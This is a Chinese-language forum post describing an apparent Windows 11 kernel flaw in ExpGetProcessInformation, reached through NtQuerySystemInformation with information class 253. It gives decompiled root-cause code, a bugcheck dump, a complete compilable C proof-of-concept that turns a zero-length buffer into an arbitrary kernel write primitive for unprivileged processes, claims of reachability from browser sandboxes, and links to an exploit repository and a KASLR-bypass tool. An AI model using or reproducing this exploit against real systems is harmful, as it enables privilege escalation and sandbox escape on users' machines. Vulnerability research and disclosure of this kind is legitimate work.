漏洞攻击
概括
- 类型:任意内核写入(递增)——提权原语
- 组件: ntoskrnl.exe —ExpGetProcessInformation
- 扳机: NtQuerySystemInformation(SystemProcessInformationExtension, kernelAddr, 0, &needed)
- 影响:任何非特权进程均可任意递增内核地址(写入原语)。
- 可通过 Chrome 沙盒访问:是(NtQuerySystemInformation 未被阻止)
- Windows 版本: Windows 11 24H2-25H2
- 利用可靠性100% 确定性
- KASLR Bypass 可以与预取工具(https://github.com/exploits-forsale/prefetch-tool)配合使用。
根本原因
ExpGetProcessInformation调用ExpQuerySystemInformation信息类 5(SystemProcessInformation)、0x39、0x94、0xFC 和0xFD(253 = SystemProcessInformationExtension)。
呼叫地点ExpQuerySystemInformation+0xD7A:
[AppleScript] 查看源码 复制代码 // Cases 5, 0x39, 0x94, 0xFC, 0xFD all share this call:
result = ExpGetProcessInformation((unsignedint *)userBuffer, bufferLength, &returnSize, NULL, infoClass);
当 userBuffer 也指向内核(例如,探测所需的缓冲区大小)时,该函数将进入:
[AppleScript] 查看源码 复制代码 // ExpGetProcessInformation, simplified:
__int64 ExpGetProcessInformation(unsignedint *buffer, unsignedint length, ..., int infoClass)
{
v91 = buffer; // = NULL
if (infoClass == 252) {
v86 = v91; // class 252 uses v86
// ...
} else {
v86 = NULL;
if (infoClass == 253) {
v95 = v91; // v95 = NULL (BUG: sanitization for kernel address check!)
goto LABEL_11;
}
// class 5 path - uses v81, doesn't touch v95
}
v95 = NULL; // class 252 path falls through here
LABEL_11:
// ... process iteration loop ...
while (NextProcess) {
if (infoClass == 253) {
++*v95; // CRASH: v95 is Arbitrary Kernel Address
v95[1] += ...; // Would also crash
v95[2] += ...; // Would also crash
}
// class 5/252 paths handle NULL buffer correctly
}
}
对于类 253,v95它被设置为缓冲区指针(v91 = buffer = NULL),而没有进行任何空值检查。进程迭代循环随后尝试递增位于处的计数器*v95,导致内核模式下的空指针解引用 → 蓝屏死机 (BSOD)。
5 类和 252 类能够正确处理 NULL 缓冲区,因为它们使用不同的变量(v81/ v86)并在解引用之前进行适当的检查。
事故详情
[AppleScript] 查看源码 复制代码 PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff800041424344, memory referenced.
Arg2: 0000000000000002, X64: bit 0 setif the fault was due to a not-present PTE.
bit1issetif the fault was due to a write, clearif a read.
bit3issetif the processor decided the fault was due to a corrupted PTE.
bit4issetif the fault was due to attempted executeof a no-execute PTE.
- ARM64: bit1issetif the fault was due to a write, clearif a read.
bit3issetif the fault was due to attempted executeof a no-execute PTE.
Arg3: fffff803a06db22e, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000002, (reserved)
IP_IN_PAGED_CODE:
nt!ExpGetProcessInformation+42e
fffff803`a06db22e ff03 inc dword ptr [rbx]
STACK_TEXT:
*** WARNING: Unable to verify checksum for poc.exe
Unable to load image C:\Users\vm\poc.exe, Win32 error 0n2
ffffd380`d4dc52f8 fffff803`a01b2d82 : ffffd380`d4dc5378 00000000`00000001 00000000`00000100 fffff803`a02c4801 : nt!DbgBreakPointWithStatus
ffffd380`d4dc5300 fffff803`a01b22ac : 00000000`00000003 ffffd380`d4dc5460 fffff803`a02c4970 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
ffffd380`d4dc5360 fffff803`a00fba97 : 00000000`00000000 fffff803`9fe46273 00000000`0000000000000000`00000000 : nt!KeBugCheck2+0xb2c
ffffd380`d4dc5af0 fffff803`9fe29dc0 : 00000000`00000050 ffff8000`41424344 00000000`00000002 ffffd380`d4dc5d90 : nt!KeBugCheckEx+0x107
ffffd380`d4dc5b30 fffff803`9fe16d96 : fffff803`a0bd9680 ffff8000`00000000 ffff8000`414243440000007f`fffffff8 : nt!MiSystemFault+0x850
ffffd380`d4dc5c20 fffff803`a02b9ecb : 00000000`0000000000000000`0000000f 00000000`000000000000000c`00000000 : nt!MmAccessFault+0x646
ffffd380`d4dc5d90 fffff803`a06db22e : 00000000`0000000100000000`00000001 00000000`c0000004 00000000`000000fd : nt!KiPageFault+0x38b
ffffd380`d4dc5f20 fffff803`a06dcfbf : 00000000`0000000000000000`00000000 ffff8701`f54e4118 00000000`00000000 : nt!ExpGetProcessInformation+0x42e
ffffd380`d4dc6540 fffff803`a06e1061 : 00000000`0000100000000000`00000000 00000000`0000000000000000`00000000 : nt!ExpQuerySystemInformation+0xd7f
ffffd380`d4dc6aa0 fffff803`a02be355 : 00000285`00b20000 ffff8701`f54e4080 ffff8701`f54e4080 00000000`00000000 : nt!NtQuerySystemInformation+0x91
ffffd380`d4dc6ae0 00007ffd`5bc82154 : 00007ff6`f01c10ef 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 : nt!KiSystemServiceCopyEnd+0x25
000000e8`7679faf8 00007ff6`f01c10ef : 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 00000285`00da4eb5 : ntdll!NtQuerySystemInformation+0x14
000000e8`7679fb00 00007ff6`f01c1374 : 00000000`0000000000000285`00da3ab0 00000000`0000000000000000`00000000 : poc+0x10ef
000000e8`7679fb30 00007ffd`5a5ae8d7 : 00000000`0000000000000000`00000000 00000000`0000000000000000`00000000 : poc+0x1374
000000e8`7679fb70 00007ffd`5bbac48c : 00000000`0000000000000000`00000000 000004f0`fffffb30 000004d0`fffffb30 : KERNEL32!BaseThreadInitThunk+0x17
000000e8`7679fba0 00000000`00000000 : 00000000`0000000000000000`00000000 00000000`0000000000000000`00000000 : ntdll!RtlUserThreadStart+0x2c
最小复现步骤(非特权用户,无需特殊令牌):
[AppleScript] 查看源码 复制代码 /**
* poc.c — NtQuerySystemInformation class 253 arbitrary kernel increment PoC
*
* Demonstrates arbitrary kernel DWORD increment via ProbeForWrite bypass.
* Passes a kernel address as the output buffer with Length=0, causing
* ExpGetProcessInformation to increment DWORDs at the target address
* without validation.
*
* Build: cl /W4 /O2 poc.c /Fe:poc.exe /link ntdll.lib
*/
#include<windows.h>
#include<stdio.h>
#pragma comment(lib, "ntdll.lib")
typedeflong NTSTATUS;
#define SystemProcessInformationExtension 253
typedefNTSTATUS(NTAPI *PNtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
intmain(void)
{
PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");
if (!pNtQSI) {
printf("[-] Failed to resolve NtQuerySystemInformation\n");
return1;
}
PVOID target = (PVOID)0xffff800041424344ULL;
printf("
NtQuerySystemInformation class 253 arbitrary kernel increment PoC\n");
printf("
Target kernel address: %p\n", target);
printf("
Will write:\n");
printf(" [target+0] += num_processes (DWORD increment)\n");
printf(" [target+4] += total_threads (DWORD add)\n");
printf(" [target+8] += total_handles (DWORD add)\n");
printf("\n");
printf("[!] This WILL bugcheck if the address is not mapped writable memory.\n");
printf("
Press Enter to trigger...\n");
getchar();
ULONG needed = 0;
NTSTATUS status = pNtQSI(
SystemProcessInformationExtension,
target, /* kernel address — ProbeForWrite skipped because Length=0 */
0, /* Length=0 bypasses ProbeForWrite entirely */
&needed
);
printf("
NtQuerySystemInformation returned: 0x%08lX\n", status);
printf("
Required length: %lu\n", needed);
printf("[+] Done. If you see this, the writes succeeded without bugcheck.\n");
return0;
}
可利用性评估——任意内核写入
ExpQuerySystemInformation在分发之前调用ProbeForWrite(buffer, Length, alignment)。Length =0 的 ProbeForWrite 完全是空操作——整个函数体都受到限制if (Length)。
因此:NtQuerySystemInformation(253, arbitraryKernelAddr, 0, &needed)将未经验证的内核指针传递给ExpGetProcessInformation。
写入原语
该函数对系统中的每个进程执行如下操作:
[AppleScript] 查看源码 复制代码 v95 = userBuffer; // attacker-controlled pointer, NOT validated for class 253 with Length=0
// For EACH process:
++*v95; // *(uint32*)(addr+0) += 1
v95[1] += threadCnt; // *(uint32*)(addr+4) += process_active_thread_count
v95[2] += handleCnt; // *(uint32*)(addr+8) += process_handle_count
- addr+0:每个进程递增 1 → 总数 = 系统上的进程数
- addr+4:所有进程线程数的总和
- addr+8:所有进程句柄计数的总和
即使 LENGTH=0,写入操作仍然发生。
ExpGetProcessInformation检查if (length < 12)并设置 STATUS_INFO_LENGTH_MISMATCH,但不会提前返回。它会存储错误状态,并继续进入进程迭代循环,对每个进程执行写入操作,v95最后返回错误状态。
可在 Chrome 沙盒、Edge 和 Firefox 浏览器中使用。
完全可达:
- NtQuerySystemInformation 不受 win32k 锁定机制的阻止
- 受限令牌并不能阻止此系统调用
- 不受信任的完整性级别不会阻止此系统调用
项目地址:
https://github.com/orinimron123/CVE-2026-40369-EXPLOIT
|
匿名
发表于